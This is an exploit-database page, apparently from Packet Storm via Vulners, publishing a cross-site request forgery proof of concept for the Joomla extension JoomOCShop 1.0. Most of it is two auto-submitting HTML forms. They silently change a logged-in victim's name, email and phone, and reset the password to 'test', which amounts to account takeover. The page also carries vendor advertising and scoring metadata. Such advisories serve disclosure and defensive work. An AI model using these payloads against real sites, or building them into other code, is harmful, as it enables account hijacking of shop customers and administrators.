Lucene search

K

Joomla JoomOCShop 1.0 Cross Site Request Forgery

🗓️ 28 May 2018 00:00:00Reported by Borna NematzadehType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 47 Views

Joomla JoomOCShop 1.0 Cross Site Request Forgery exploi

Show more
Code
`# Exploit Title: Joomla! extension JoomOCShop 1.0 - Cross site request forgery  
# Date: 2018-05-28  
# Exploit Author: L0RD or [email protected]  
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/joomocshop/  
# Vendor Homepage: https://www.joomlaextensions.co.in/  
# Version: 1.0  
# Tested on: Kali linux  
===================================================  
  
# POC :  
  
# Change user information exploit :  
  
<html>  
<body>  
<form action="http://site.com/joomoc2/?route=account/edit" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="firstname" value="decode" />  
<input type="hidden" name="lastname" value="revenge" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="telephone" value="100000" />  
<input type="hidden" name="fax" value=" " />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
  
# Change password exploit :  
  
<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="password" value="test" />  
<input type="hidden" name="confirm" value="test" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
  
====================================================  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 May 2018 00:00Current
0.2Low risk
Vulners AI Score0.2
47
.json
Report